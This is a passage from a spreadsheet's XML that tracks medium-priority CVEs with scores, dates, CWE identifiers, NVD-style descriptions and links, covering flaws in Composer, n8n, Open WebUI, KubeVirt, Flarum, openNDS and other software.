      </c>
      <c r="M2423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84256</t>
        </is>
      </c>
    </row>
    <row r="2424">
      <c r="A2424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84361</t>
        </is>
      </c>
      <c r="C2424" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2424" s="5" t="inlineStr"/>
      <c r="F2424" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2424" s="5" t="inlineStr"/>
      <c r="H2424" s="5" t="inlineStr"/>
      <c r="I2424" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2424" s="5" t="inlineStr"/>
      <c r="K2424" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2424" s="5" t="inlineStr">
        <is>
          <t>Composer is a dependency Manager for the PHP language. From 1.0 until 2.2.30 and 2.10.3, a malicious dependency package from a custom Composer repository or an untrusted composer.lock file could set source.type to perforce and source.url to an rsh: or jsh: P4PORT value. When the Perforce p4 client was installed and Composer installed the package from source through composer install or composer update, including --prefer-source, Composer\Util\Perforce passed the address to p4 without validation, causing p4 to run a local command with the privileges of the user or CI account. Packagist.org does not permit Perforce source metadata. This issue is fixed in versions 2.2.30 and 2.10.3.</t>
        </is>
      </c>
      <c r="M2424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84361</t>
        </is>
      </c>
    </row>
    <row r="2425">
      <c r="A2425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85168</t>
        </is>
      </c>
      <c r="C2425" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2425" s="5" t="inlineStr"/>
      <c r="F2425" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2425" s="5" t="inlineStr"/>
      <c r="H2425" s="5" t="inlineStr"/>
      <c r="I2425" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2425" s="5" t="inlineStr"/>
      <c r="K2425" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2425" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 contain a remote code execution vulnerability in the Git node. The node reset a fixed list of command-bearing configuration keys before each operation, but that list did not cover the content-filter and merge-driver key families. A repository with local configuration setting one of those keys together with a matching attribute pattern causes git to execute the configured command during an ordinary Add, Commit, Checkout, or Pull operation. The command runs as the n8n process user.</t>
        </is>
      </c>
      <c r="M2425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85168</t>
        </is>
      </c>
    </row>
    <row r="2426">
      <c r="A2426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85182</t>
        </is>
      </c>
      <c r="C2426" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2426" s="5" t="inlineStr"/>
      <c r="F2426" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2426" s="5" t="inlineStr"/>
      <c r="H2426" s="5" t="inlineStr"/>
      <c r="I2426" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2426" s="5" t="inlineStr"/>
      <c r="K2426" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2426" s="5" t="inlineStr">
        <is>
          <t>vhr through commit 03abbd3 fails to verify that the account ID in PUT /hr/pass requests belongs to the authenticated caller. Authenticated attackers can change arbitrary account passwords by supplying a target account ID and that account's current password in the request body.</t>
        </is>
      </c>
      <c r="M2426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85182</t>
        </is>
      </c>
    </row>
    <row r="2427">
      <c r="A2427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85619</t>
        </is>
      </c>
      <c r="C2427" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2427" s="5" t="inlineStr"/>
      <c r="F2427" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2427" s="5" t="inlineStr"/>
      <c r="H2427" s="5" t="inlineStr"/>
      <c r="I2427" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2427" s="5" t="inlineStr"/>
      <c r="K2427" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2427" s="5" t="inlineStr">
        <is>
          <t>AppFlowy-Cloud 0.9.64 fails to verify that requested collab objects belong to the workspace in authorization checks, allowing attackers to access documents and database rows across workspaces. Attackers can supply a victim's object ID with their own workspace ID to bypass access controls and read, modify, or delete cross-workspace data.</t>
        </is>
      </c>
      <c r="M2427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85619</t>
        </is>
      </c>
    </row>
    <row r="2428">
      <c r="A2428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86083</t>
        </is>
      </c>
      <c r="C2428" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2428" s="5" t="inlineStr"/>
      <c r="F2428" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2428" s="5" t="inlineStr"/>
      <c r="H2428" s="5" t="inlineStr"/>
      <c r="I2428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2428" s="5" t="inlineStr"/>
      <c r="K2428" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2428" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t>
        </is>
      </c>
    </row>
    <row r="2429">
      <c r="A2429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86207</t>
        </is>
      </c>
      <c r="C2429" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2429" s="5" t="inlineStr"/>
      <c r="F2429" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2429" s="5" t="inlineStr"/>
      <c r="H2429" s="5" t="inlineStr"/>
      <c r="I2429" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2429" s="5" t="inlineStr"/>
      <c r="K2429" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="L2429" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass in N-central &lt; 2026.3 HF 3 leads to authentication bypass in internal only APIs</t>
        </is>
      </c>
      <c r="M2429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86207</t>
        </is>
      </c>
    </row>
    <row r="2430">
      <c r="A2430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86494</t>
        </is>
      </c>
      <c r="C2430" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2430" s="5" t="inlineStr"/>
      <c r="F2430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2430" s="5" t="inlineStr"/>
      <c r="H2430" s="5" t="inlineStr"/>
      <c r="I2430" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2430" s="5" t="inlineStr"/>
      <c r="K2430" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2430" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 cloning a whiteboard allowed unauthorized changes to links on inaccessible issues</t>
        </is>
      </c>
      <c r="M2430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86494</t>
        </is>
      </c>
    </row>
    <row r="2431">
      <c r="A2431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86498</t>
        </is>
      </c>
      <c r="C2431" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2431" s="5" t="inlineStr"/>
      <c r="F2431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2431" s="5" t="inlineStr"/>
      <c r="H2431" s="5" t="inlineStr"/>
      <c r="I2431" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2431" s="5" t="inlineStr"/>
      <c r="K2431" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2431" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2025.3.160480, 
2026.1.14047 pUT requests on link sub-resources allowed modification linked entities without update permission</t>
        </is>
      </c>
      <c r="M2431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86498</t>
        </is>
      </c>
    </row>
    <row r="2432">
      <c r="A2432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87084</t>
        </is>
      </c>
      <c r="C2432" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2432" s="5" t="inlineStr"/>
      <c r="F2432" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2432" s="5" t="inlineStr"/>
      <c r="H2432" s="5" t="inlineStr"/>
      <c r="I2432" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2432" s="5" t="inlineStr"/>
      <c r="K2432" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2432" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a server-side request forgery vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="M2432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87084</t>
        </is>
      </c>
    </row>
    <row r="2433">
      <c r="A2433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87993</t>
        </is>
      </c>
      <c r="C2433" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2433" s="5" t="inlineStr"/>
      <c r="F2433" s="5" t="inlineStr"/>
      <c r="G2433" s="5" t="inlineStr"/>
      <c r="H2433" s="5" t="inlineStr"/>
      <c r="I2433" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2433" s="5" t="inlineStr"/>
      <c r="K2433" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L2433" s="5" t="inlineStr">
        <is>
          <t>The consul-template library is vulnerable to an information disclosure issue in its error handling path that may allow Vault secret values to appear in template error messages, log output, and downstream surfaces such as Nomad task events. This vulnerability (CVE-2026-87993) is fixed in consul-template 0.43.0.</t>
        </is>
      </c>
      <c r="M2433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87993</t>
        </is>
      </c>
    </row>
    <row r="2434">
      <c r="A2434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87996</t>
        </is>
      </c>
      <c r="C2434" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2434" s="5" t="inlineStr"/>
      <c r="F2434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2434" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2434" s="5" t="inlineStr"/>
      <c r="I2434" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2434" s="5" t="inlineStr"/>
      <c r="K2434" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L2434" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.1, SafePlaywrightURLLoader in backend/open_webui/retrieval/web/utils.py validated a user-controlled hostname in Python and then let the Playwright browser resolve it again in the sync and async request interceptors. An authenticated user controlling authoritative DNS could return a public address to validation and an internal address to the browser, exposing responses from internal services or cloud metadata through web search or URL ingestion. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M2434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87996</t>
        </is>
      </c>
    </row>
    <row r="2435">
      <c r="A2435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89060</t>
        </is>
      </c>
      <c r="C2435" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2435" s="5" t="inlineStr"/>
      <c r="F2435" s="5" t="inlineStr"/>
      <c r="G2435" s="5" t="inlineStr"/>
      <c r="H2435" s="5" t="inlineStr"/>
      <c r="I2435" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2435" s="5" t="inlineStr"/>
      <c r="K2435" s="5" t="inlineStr">
        <is>
          <t>CWE-551</t>
        </is>
      </c>
      <c r="L2435" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in multicluster-observability-addon. This vulnerability allows a managed-cluster identity to reference configuration resources outside its designated namespace. This can lead to the disclosure of sensitive hub Secrets to an attacker-controlled managed cluster.</t>
        </is>
      </c>
      <c r="M2435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89060</t>
        </is>
      </c>
    </row>
    <row r="2436">
      <c r="A2436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9040</t>
        </is>
      </c>
      <c r="C2436" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2436" s="5" t="inlineStr"/>
      <c r="F2436" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2436" s="5" t="inlineStr"/>
      <c r="H2436" s="5" t="inlineStr"/>
      <c r="I2436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2436" s="5" t="inlineStr"/>
      <c r="K2436" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2436" s="5" t="inlineStr">
        <is>
          <t>A race condition vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to cause a denial of service or disclose sensitive information.
This issue affects Bifrost GPU Kernel Driver: from r12p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r19p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t>
        </is>
      </c>
    </row>
    <row r="2437">
      <c r="A2437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9804</t>
        </is>
      </c>
      <c r="C2437" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2437" s="5" t="inlineStr"/>
      <c r="F2437" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2437" s="5" t="inlineStr"/>
      <c r="H2437" s="5" t="inlineStr"/>
      <c r="I2437" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2437" s="5" t="inlineStr"/>
      <c r="K2437" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2437" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in KubeVirt's virt-exportserver component. An attacker with specific namespace-level access can exploit a path traversal vulnerability in the VMExport directory endpoint. By placing a symbolic link (symlink) within an exported filesystem Persistent Volume Claim (PVC) that points outside its designated mount root, the attacker can read arbitrary files from the exporter pod's filesystem. This leads to information disclosure, potentially exposing sensitive data.</t>
        </is>
      </c>
      <c r="M2437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9804</t>
        </is>
      </c>
    </row>
    <row r="2438">
      <c r="A2438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2438" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-46418</t>
        </is>
      </c>
      <c r="C2438" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2438" s="5" t="inlineStr"/>
      <c r="F2438" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2438" s="5" t="inlineStr"/>
      <c r="H2438" s="5" t="inlineStr"/>
      <c r="I2438" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2438" s="5" t="inlineStr"/>
      <c r="K2438" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2438" s="5" t="inlineStr">
        <is>
          <t>Westermo WeOS 5.x starting from 5.24 allows OS command injection via a media definition.</t>
        </is>
      </c>
      <c r="M2438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-46418</t>
        </is>
      </c>
    </row>
    <row r="2439">
      <c r="A2439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16313</t>
        </is>
      </c>
      <c r="C2439" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2439" s="5" t="inlineStr"/>
      <c r="F2439" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2439" s="5" t="inlineStr"/>
      <c r="H2439" s="5" t="inlineStr"/>
      <c r="I2439" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J2439" s="5" t="inlineStr"/>
      <c r="K2439" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L2439" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in sg3_utils. The sg_inq command, when invoked with the --export option, outputs device identification data without sanitizing control characters in SCSI name string fields. A newline character embedded in a device-supplied name string can inject arbitrary properties into the udev device database. This could allow an attacker who can present a crafted SCSI device to execute arbitrary commands as root when the device is disconnected.</t>
        </is>
      </c>
      <c r="M2439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16313</t>
        </is>
      </c>
    </row>
    <row r="2440">
      <c r="A2440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18621</t>
        </is>
      </c>
      <c r="C2440" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2440" s="5" t="inlineStr"/>
      <c r="F2440" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2440" s="5" t="inlineStr"/>
      <c r="H2440" s="5" t="inlineStr"/>
      <c r="I2440" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2440" s="5" t="inlineStr"/>
      <c r="K2440" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L2440" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Data Science Pipelines (DSP). An attacker with namespace editor privileges can bypass security hardening by submitting a malicious Argo Workflow through the V1 API path. This allows the API server to create pods with elevated privileges, acting as a 'confused deputy' on behalf of the attacker. Successful exploitation grants the attacker node-root access, enabling arbitrary code execution and full control over the underlying node.</t>
        </is>
      </c>
      <c r="M2440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18621</t>
        </is>
      </c>
    </row>
    <row r="2441">
      <c r="A2441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19387</t>
        </is>
      </c>
      <c r="C2441" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2441" s="5" t="inlineStr"/>
      <c r="F2441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2441" s="5" t="inlineStr"/>
      <c r="H2441" s="5" t="inlineStr"/>
      <c r="I2441" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2441" s="5" t="inlineStr"/>
      <c r="K2441" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2441" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds write vulnerability was found in the GStreamer gst-plugins-bad adpcmdec element when decoding IMA/DVI ADPCM audio. Insufficient validation of the per-block sample count for multi-channel streams allows a crafted WAV file to cause writes beyond the allocated output buffer. This can lead to application crash, denial of service, memory corruption, or potentially arbitrary code execution when untrusted media is processed.</t>
        </is>
      </c>
      <c r="M2441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19387</t>
        </is>
      </c>
    </row>
    <row r="2442">
      <c r="A2442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19869</t>
        </is>
      </c>
      <c r="C2442" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2442" s="5" t="inlineStr"/>
      <c r="F2442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2442" s="5" t="inlineStr"/>
      <c r="H2442" s="5" t="inlineStr"/>
      <c r="I2442" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2442" s="5" t="inlineStr"/>
      <c r="K2442" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2442" s="5" t="inlineStr">
        <is>
          <t>@neo4j/graphql from 5.2.0 until the patched versions fails to enforce field-level @authentication rules on root custom-resolver fields when a type-level @authentication rule is also present on the same operation type. When both a type-level @authentication (on Query/Mutation) and a field-level @authentication (on a root custom-resolver field within that type) are declared, only the type-level rule is evaluated and the field-level rule is silently discarded. As a result a stricter per-field requirement — such as an admin-role JWT claim (jwt: { roles_INCLUDES: "admin" }) — is never checked, and any client that satisfies the coarser type-level requirement can invoke the more-restricted field. No token forgery is involved: a legitimately issued, correctly signed non-admin token (e.g. roles: ["user"]) is sufficient.</t>
        </is>
      </c>
      <c r="M2442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19869</t>
        </is>
      </c>
    </row>
    <row r="2443">
      <c r="A2443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38822</t>
        </is>
      </c>
      <c r="C2443" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2443" s="5" t="inlineStr"/>
      <c r="F2443" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2443" s="5" t="inlineStr"/>
      <c r="H2443" s="5" t="inlineStr"/>
      <c r="I2443" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2443" s="5" t="inlineStr"/>
      <c r="K2443" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2443" s="5" t="inlineStr">
        <is>
          <t>In openNDS before 11.0.0, the client_params.sh script, invoked by the openNDS daemon to serve the authenticated client status page, is vulnerable to OS command injection through crafted HTTP GET query parameter keys. An authenticated captive portal user can inject arbitrary shell commands by embedding semicolons in a URL query parameter name.</t>
        </is>
      </c>
      <c r="M2443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38822</t>
        </is>
      </c>
    </row>
    <row r="2444">
      <c r="A2444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39924</t>
        </is>
      </c>
      <c r="C2444" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2444" s="5" t="inlineStr"/>
      <c r="F2444" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2444" s="5" t="inlineStr"/>
      <c r="H2444" s="5" t="inlineStr"/>
      <c r="I2444" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2444" s="5" t="inlineStr"/>
      <c r="K2444" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2444" s="5" t="inlineStr">
        <is>
          <t>Flarum before 1.8.16 contains an improper session invalidation vulnerability that allows attackers who hold a valid session token to retain full account access after a victim changes their password, because the access_tokens table is never cleared on password change events. The TokensClearer::clearPasswordTokens() function only removes rows from the password_tokens table while leaving all active session cookies and API bearer tokens intact, including long-lived RememberAccessToken entries, and administrator-forced password resets via the user update endpoint are equally ineffective at revoking attacker-held sessions.</t>
        </is>
      </c>
      <c r="M2444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39924</t>
        </is>
      </c>
    </row>
    <row r="2445">
      <c r="A2445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42804</t>
        </is>
      </c>
      <c r="C2445" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2445" s="5" t="inlineStr"/>
      <c r="F2445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2445" s="5" t="inlineStr"/>
      <c r="H2445" s="5" t="inlineStr"/>
      <c r="I2445" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2445" s="5" t="inlineStr"/>
      <c r="K2445" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2445" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the Bosch Sensortec BHI360 SensorAPI(C-Library) in versions up to and including commit d6b200416a.
The vulnerability is located within the FIFO parsing and debug logging subsystem inside the function bhi360_parse_debug_message() in bhi360_parse.c (lines 1852-1875). 
The parser trusts the first payload byte of a debug frame as the message length (msg_length) and copies that many bytes into a fixed-size 17-byte stack buffer (debug_msg) via memcpy without performing any bounds checking.
